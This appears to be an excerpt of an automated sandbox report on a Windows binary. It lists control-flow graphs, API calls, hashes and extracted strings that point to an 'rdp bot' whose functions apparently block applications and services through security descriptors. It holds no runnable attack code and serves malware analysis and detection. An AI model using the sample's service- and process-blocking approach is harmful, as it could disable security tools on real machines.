7ff77572ccd9 2 API calls 9818->9824 9823 7ff77572ca90 fputwc 9819->9823 9820->9818 9821->9818 9822->9816 9825 7ff77572d875 9823->9825 9824->9818 10878 7ff775730088 ___lc_codepage_func ___mb_cur_max_func 10879 7ff7757300b7 10878->10879 10880 7ff7757300f1 10878->10880 10881 7ff7757300c3 10879->10881 10884 7ff7757300bc 10879->10884 10881->10880 10883 7ff77572ffd0 2 API calls 10881->10883 10882 7ff77572ffd0 2 API calls 10882->10884 10883->10881 10884->10880 10884->10882 10907 7ff77572ac96 10908 7ff77572ad13 signal 10907->10908 10910 7ff77572aca1 10907->10910 10909 7ff77572ad25 signal 10908->10909 10908->10910 10909->10910 10911 7ff775727096 10912 7ff7757270b2 strlen 10911->10912 10913 7ff7757270c7 10911->10913 10912->10913

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007FF7757245D5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 7ff7757245d5-7ff7757245f1 1 7ff775724687-7ff7757246b5 call 7ff7757214e2 0->1 2 7ff7757245f7-7ff7757245fa 0->2 10 7ff775724b39-7ff775724b4a 1->10 4 7ff7757246ba-7ff7757246e8 call 7ff7757214e2 2->4 5 7ff775724600-7ff775724604 2->5 4->10 8 7ff775724610-7ff775724625 fopen 5->8 9 7ff775724606-7ff77572460a 5->9 13 7ff77572462b-7ff775724640 fseek 8->13 14 7ff775724720-7ff775724749 _errno call 7ff7757214e2 _errno 8->14 9->8 12 7ff7757246ed-7ff77572471b call 7ff7757214e2 9->12 15 7ff775724b4c 10->15 16 7ff775724b53-7ff775724b60 10->16 12->10 19 7ff7757247f3-7ff775724800 call 7ff7757304e8 13->19 20 7ff775724646-7ff77572466f _errno call 7ff7757214e2 _errno 13->20 29 7ff77572474b-7ff775724758 14->29 30 7ff77572478f-7ff7757247a3 _errno 14->30 15->16 22 7ff775724b99-7ff775724ba0 16->22 23 7ff775724b62-7ff775724b73 call 7ff7757214e2 16->23 32 7ff77572482b-7ff775724854 _errno call 7ff7757214e2 _errno 19->32 33 7ff775724802 19->33 35 7ff7757247da-7ff7757247ee _errno 20->35 36 7ff775724675-7ff775724682 20->36 22->23 34 7ff775724b78-7ff775724b8a 23->34 29->30 37 7ff775724b28-7ff775724b2b 30->37 49 7ff77572489a-7ff7757248ae _errno 32->49 50 7ff775724856-7ff775724863 32->50 40 7ff775724808-7ff77572480d 33->40 41 7ff775724b23 33->41 35->37 36->1 38 7ff775724b2d-7ff775724b30 fclose 37->38 39 7ff775724b35-7ff775724b37 37->39 38->39 39->10 43 7ff775724ba2-7ff775724bbb call 7ff7757214e2 39->43 44 7ff7757248b3-7ff7757248cb fseek 40->44 45 7ff775724813-7ff775724818 40->45 41->37 43->34 51 7ff7757248cd-7ff7757248d9 44->51 52 7ff775724941-7ff77572496a _errno call 7ff7757214e2 _errno 44->52 45->44 48 7ff77572481e-7ff775724826 45->48 48->37 49->37 50->49 55 7ff7757249c9-7ff7757249eb GetProcessHeap HeapAlloc 51->55 56 7ff7757248df-7ff7757248e5 51->56 62 7ff77572496c-7ff775724979 52->62 63 7ff7757249b0-7ff7757249c4 _errno 52->63 55->56 60 7ff7757249f1-7ff775724a07 call 7ff7757214e2 55->60 57 7ff7757248eb 56->57 58 7ff775724b92-7ff775724b97 56->58 61 7ff7757248f0-7ff7757248ff 57->61 58->37 60->56 65 7ff775724a9e-7ff775724aa7 61->65 66 7ff775724905-7ff775724907 61->66 62->63 63->37 69 7ff775724aa9-7ff775724aab 65->69 70 7ff775724acf-7ff775724af2 call 7ff7757214e2 65->70 66->65 68 7ff77572490d-7ff775724930 fread 66->68 68->65 71 7ff775724936 68->71 72 7ff775724aad-7ff775724ab2 69->72 73 7ff775724af4-7ff775724af9 69->73 70->72 75 7ff775724a0c-7ff775724a35 _errno call 7ff7757214e2 _errno 71->75 76 7ff77572493c-7ff77572493f 71->76 72->37 77 7ff775724ab4-7ff775724acd GetProcessHeap HeapFree 72->77 79 7ff775724afb-7ff775724b01 73->79 80 7ff775724b03-7ff775724b0c 73->80 83 7ff775724a37-7ff775724a44 75->83 84 7ff775724a7b-7ff775724a8f _errno 75->84 76->61 77->37 79->37 80->79 83->84 84->61
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                                                                                                  • API String ID: 2897271634-4120527733
                                                                                                                                                  • Opcode ID: b829813eb9698e215a266fa2b4b31c54f972829afe64dadd3eff5c7fe421969e
                                                                                                                                                  • Instruction ID: ae83998c3ee9f3d12cf1f1b5ca8d97b179e6e10b37e908fb80a225cc936fe5b2
                                                                                                                                                  • Opcode Fuzzy Hash: b829813eb9698e215a266fa2b4b31c54f972829afe64dadd3eff5c7fe421969e
                                                                                                                                                  • Instruction Fuzzy Hash: 85D17133E3868B91EA20BB15E8417B8A762FF48F95FD54132D90D576A0DE3CE945C3A0
                                                                                                                                                  Function 00007FF77572855D Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 393COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                                                                                                                                                  • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                                                                                                                                                  • API String ID: 1025937399-1899507746
                                                                                                                                                  • Opcode ID: 5eefb5ce101ca54b87197a8626b6cf7e368369295640dbdbd5fb03039e3b8b91
                                                                                                                                                  • Instruction ID: ea5bfe481cbd065c77effcd393fe9f8465b609da7a0c8346b5943acce2f8a24a
                                                                                                                                                  • Opcode Fuzzy Hash: 5eefb5ce101ca54b87197a8626b6cf7e368369295640dbdbd5fb03039e3b8b91
                                                                                                                                                  • Instruction Fuzzy Hash: 41F12823E3C74386FA706B54A49037C9271EF4CF54FD44032C60E8A6D6CE6EA8C596E6
                                                                                                                                                  Function 00007FF775721131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3714283218-0
                                                                                                                                                  • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                                                                                                                  • Instruction ID: 51bac5fc08003d1bf1eb59fdfa402b9ff256afa139961c89ad002235c703311e
                                                                                                                                                  • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                                                                                                                  • Instruction Fuzzy Hash: CF511827A38A8685EB51FB16E851679A3A0FF4CFA4F958035DD0D47391EE3CE84087E1
                                                                                                                                                  Function 00007FF775728CFC Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 281memorystringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 85 7ff775728cfc-7ff775728d3f call 7ff775729bb9 88 7ff77572927f 85->88 89 7ff775728d45-7ff775728d47 85->89 90 7ff775729284-7ff775729299 88->90 89->90 91 7ff775728d4d-7ff775728d59 89->91 91->90 92 7ff775728d5f-7ff775728d71 call 7ff775721cf4 91->92 95 7ff775728d91-7ff775728d97 92->95 96 7ff775728d73-7ff775728d7d call 7ff775721c73 92->96 97 7ff775728d9c-7ff775728d9e 95->97 101 7ff775728d82-7ff775728d88 96->101 99 7ff775728db7-7ff775728dce call 7ff775721c73 97->99 100 7ff775728da0-7ff775728da3 97->100 106 7ff775729257 99->106 107 7ff775728dd4-7ff775728deb call 7ff775721c73 99->107 100->90 102 7ff775728da9-7ff775728db2 FreeLibrary 100->102 101->97 104 7ff775728d8a-7ff775728d8f 101->104 102->90 104->100 110 7ff775729261 106->110 107->110 111 7ff775728df1-7ff775728e03 call 7ff775721c73 107->111 113 7ff77572926b 110->113 111->113 115 7ff775728e09-7ff775728e20 call 7ff775721c73 111->115 116 7ff775729275 113->116 115->116 119 7ff775728e26-7ff775728e2c 115->119 116->88 120 7ff775728e76-7ff775728e82 119->120 120->100 121 7ff775728e88-7ff775728e8a 120->121 121->100 122 7ff775728e90-7ff775728eca call 7ff77572a1f1 121->122 125 7ff775728ecc-7ff775728f29 strlen 122->125 126 7ff775728e72 122->126 128 7ff775728e2e-7ff775728e49 call 7ff7757214e2 125->128 129 7ff775728f2f-7ff775728f5e 125->129 126->120 128->126 133 7ff775728e4b-7ff775728e5e call 7ff7757214e2 129->133 134 7ff775728f64-7ff775728f8d GetProcessHeap HeapAlloc 129->134 141 7ff775728e63-7ff775728e6b 133->141 135 7ff775728f93-7ff775728fac 134->135 136 7ff7757290a4-7ff7757290c4 call 7ff7757214e2 134->136 143 7ff7757290c9-7ff7757290df call 7ff7757214e2 135->143 144 7ff775728fb2-7ff775729067 BuildTrusteeWithSidW BuildSecurityDescriptorW 135->144 136->141 141->126 153 7ff7757290e4-7ff7757290ec 143->153 145 7ff7757291a9-7ff7757291da call 7ff77572795a 144->145 146 7ff77572906d-7ff775729086 call 7ff7757214e2 144->146 156 7ff7757291dc-7ff7757291ea LocalFree 145->156 157 7ff7757291ef-7ff775729200 call 7ff7757214e2 145->157 154 7ff77572910e-7ff775729114 146->154 155 7ff77572908c 146->155 153->141 158 7ff7757290f2-7ff775729109 GetProcessHeap HeapFree 153->158 161 7ff77572911a-7ff775729120 154->161 162 7ff775729211-7ff775729216 154->162 159 7ff775729092-7ff77572909f 155->159 160 7ff77572919f-7ff7757291a4 155->160 156->153 166 7ff775729205 157->166 158->141 159->153 160->153 164 7ff775729122-7ff775729125 161->164 165 7ff775729153-7ff775729159 161->165 162->153 169 7ff775729127-7ff77572912a 164->169 170 7ff775729140-7ff775729146 164->170 167 7ff775729239-7ff77572923e 165->167 168 7ff77572915f-7ff775729165 165->168 166->156 167->153 175 7ff77572916b-7ff775729171 168->175 176 7ff775729243-7ff775729248 168->176 171 7ff77572921b-7ff775729220 169->171 172 7ff775729130-7ff775729133 169->172 173 7ff77572914c-7ff775729151 170->173 174 7ff77572922f-7ff775729234 170->174 171->153 177 7ff775729139-7ff77572913e 172->177 178 7ff775729225-7ff77572922a 172->178 173->153 174->153 179 7ff775729177-7ff77572917c 175->179 180 7ff77572924d-7ff775729252 175->180 176->153 177->153 178->153 179->153 180->153
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                                                                                                                                                  • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                                                                                                                                                  • API String ID: 3039259412-1782951725
                                                                                                                                                  • Opcode ID: 01bd502358aa155a117c52bb5c5ca10456543c715832b3d2c21d1eaa9214cc1f
                                                                                                                                                  • Instruction ID: 9cbe41ea9b17d8d6c00c4b9c039df24f5fdc3b5044f1503d11110eb2e780690f
                                                                                                                                                  • Opcode Fuzzy Hash: 01bd502358aa155a117c52bb5c5ca10456543c715832b3d2c21d1eaa9214cc1f
                                                                                                                                                  • Instruction Fuzzy Hash: BCD14D22A3C78381FB60AB01E4803A9B760FF8DB54FD44035DA8D46795DE7DE985C7A1
                                                                                                                                                  Function 00007FF77572433B Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 133fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fopenfwrite
                                                                                                                                                  • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                                                                                                  • API String ID: 1336347884-544371937
                                                                                                                                                  • Opcode ID: 63a72207a667d57a4e2fcc2606be0a732238c3333479fe985393a82e7d73d70b
                                                                                                                                                  • Instruction ID: 3474048d5330b73c05cc3a940ca332f58c8481c2411dcb5e2d41d35b74ab8445
                                                                                                                                                  • Opcode Fuzzy Hash: 63a72207a667d57a4e2fcc2606be0a732238c3333479fe985393a82e7d73d70b
                                                                                                                                                  • Instruction Fuzzy Hash: 2F518163E3868786FA20BB55D9412B8A362FF48FA5FD84136D90D47291DE3CE546C3A0
                                                                                                                                                  Function 00007FF77572168C Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 375 7ff77572168c-7ff7757216b4 InitializeCriticalSectionAndSpinCount 376 7ff7757216ba-7ff7757216ee call 7ff7757219c0 call 7ff775726b9b 375->376 377 7ff7757217e0-7ff775721801 GetLastError call 7ff7757214e2 375->377 392 7ff7757217b9-7ff7757217d1 call 7ff7757214e2 376->392 393 7ff7757216f4-7ff77572170b strlen 376->393 383 7ff775721822-7ff775721828 377->383 384 7ff775721803 377->384 388 7ff7757218eb 383->388 389 7ff77572182e-7ff775721834 383->389 386 7ff775721809-7ff775721816 384->386 387 7ff7757218e1-7ff7757218e6 384->387 386->383 387->392 396 7ff7757218f5-7ff7757218fa 388->396 390 7ff775721860-7ff775721863 389->390 391 7ff775721836-7ff77572183c 389->391 397 7ff77572187d-7ff775721883 390->397 398 7ff775721865-7ff775721868 390->398 394 7ff775721909-7ff77572190e 391->394 395 7ff775721842-7ff775721848 391->395 408 7ff7757217d6-7ff7757217df 392->408 400 7ff77572170d-7ff775721710 393->400 401 7ff775721723-7ff775721726 393->401 394->392 404 7ff77572184e-7ff775721854 395->404 405 7ff775721913-7ff775721918 395->405 396->392 409 7ff7757218ff 397->409 410 7ff775721885-7ff77572188a 397->410 406 7ff7757218d7 398->406 407 7ff77572186a-7ff77572186d 398->407 400->401 411 7ff775721712-7ff77572171f strlen 400->411 402 7ff775721748-7ff775721791 strlen fopen 401->402 403 7ff775721728-7ff775721742 strcat strlen 401->403 412 7ff775721797-7ff7757217b3 call 7ff7757214e2 402->412 413 7ff7757218ad-7ff7757218c8 call 7ff7757214e2 402->413 403->402 414 7ff77572188f-7ff775721894 404->414 415 7ff775721856-7ff77572185b 404->415 405->392 406->387 407->396 416 7ff775721873-7ff775721878 407->416 409->394 410->392 411->401 412->392 421 7ff77572191d-7ff775721937 call 7ff7757214e2 412->421 413->392 414->392 415->392 416->392 421->408
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                                                                                                                                                  • API String ID: 3395718042-2291025694
                                                                                                                                                  • Opcode ID: 0c6137ecaf56a976e39702cb80bce37edb64c5d5fd7c245d775e8e5e4a3d302b
                                                                                                                                                  • Instruction ID: 4fff6320c060c7f47d1108a912c854acee30e1a3222eac5e1b882a152c7c3d9d
                                                                                                                                                  • Opcode Fuzzy Hash: 0c6137ecaf56a976e39702cb80bce37edb64c5d5fd7c245d775e8e5e4a3d302b
                                                                                                                                                  • Instruction Fuzzy Hash: 20512C63E3C78785F620BB51A8813B89265FF5CF64FD04132C90E067A2DE6DA945C3E1
                                                                                                                                                  Function 00007FF775725E6F Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 199fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 424 7ff775725e6f-7ff775725e80 425 7ff775725f72-7ff775725fa0 call 7ff7757214e2 424->425 426 7ff775725e86-7ff775725e89 424->426 434 7ff775725f32-7ff775725f35 425->434 427 7ff775725e8f-7ff775725ed4 CreateFileA 426->427 428 7ff775725fa2-7ff775725fd0 call 7ff7757214e2 426->428 432 7ff775725eda-7ff775725f08 LockFileEx 427->432 433 7ff775725fd5-7ff775725ff9 GetLastError call 7ff7757214e2 427->433 428->434 437 7ff7757260ba-7ff7757260de GetLastError call 7ff7757214e2 432->437 438 7ff775725f0e-7ff775725f21 432->438 445 7ff775725ffb 433->445 446 7ff775726013-7ff775726019 433->446 442 7ff775725f37 434->442 443 7ff775725f3e-7ff775725f4b 434->443 451 7ff7757260f8-7ff7757260fe 437->451 452 7ff7757260e0 437->452 440 7ff775725f27-7ff775725f2c 438->440 441 7ff77572622b-7ff77572622e CloseHandle 438->441 440->434 447 7ff775726245-7ff77572625e call 7ff7757214e2 440->447 448 7ff775726239 441->448 442->443 443->448 449 7ff775725f51-7ff775725f62 call 7ff7757214e2 443->449 454 7ff7757260b0 445->454 455 7ff775726001-7ff77572600e 445->455 456 7ff7757261a9 446->456 457 7ff77572601f-7ff775726025 446->457 466 7ff775725f67-7ff775725f71 447->466 448->447 449->466 461 7ff7757261ef 451->461 462 7ff775726104-7ff77572610a 451->462 459 7ff7757260e6-7ff7757260f3 452->459 460 7ff775726195 452->460 454->437 455->446 471 7ff7757261b3 456->471 464 7ff775726027-7ff77572602d 457->464 465 7ff775726051-7ff775726054 457->465 459->451 460->456 475 7ff7757261f9 461->475 469 7ff77572610c-7ff77572610f 462->469 470 7ff775726143-7ff775726149 462->470 472 7ff7757261d1 464->472 473 7ff775726033-7ff775726039 464->473 467 7ff775726072-7ff775726078 465->467 468 7ff775726056-7ff775726059 465->468 478 7ff7757261c7 467->478 479 7ff77572607e 467->479 468->471 474 7ff77572605f-7ff775726062 468->474 476 7ff77572612d-7ff775726133 469->476 477 7ff775726111-7ff775726114 469->477 480 7ff775726217 470->480 481 7ff77572614f-7ff775726155 470->481 485 7ff7757261bd 471->485 482 7ff7757261db 472->482 473->482 483 7ff77572603f-7ff775726045 473->483 484 7ff775726068 474->484 474->485 493 7ff775726203 475->493 487 7ff775726139 476->487 488 7ff77572620d 476->488 477->475 486 7ff77572611a-7ff77572611d 477->486 478->472 491 7ff775726088 479->491 490 7ff775726221 480->490 489 7ff77572615b-7ff775726161 481->489 481->490 482->461 483->491 492 7ff775726047 483->492 484->467 485->478 486->493 494 7ff775726123 486->494 487->470 488->480 495 7ff77572616d 489->495 496 7ff775726163 489->496 490->441 491->454 492->465 493->488 494->476 495->460 496->495
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                                                                                                  • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                                                                                                                                                  • API String ID: 2747014929-530486279
                                                                                                                                                  • Opcode ID: db00cb17437c5ff3fe8cc15a43f8113af3fe9d2b3f4d37739a65c9d18e836ee3
                                                                                                                                                  • Instruction ID: fdac930f0b7a5e0a5b362580745428306d241802855e7c14cf932fe850ca2612
                                                                                                                                                  • Opcode Fuzzy Hash: db00cb17437c5ff3fe8cc15a43f8113af3fe9d2b3f4d37739a65c9d18e836ee3
                                                                                                                                                  • Instruction Fuzzy Hash: AD816452D3C38B81FA347B44A844778B260DF08F64FD49133D96D0B6D1EE6DA98593E2
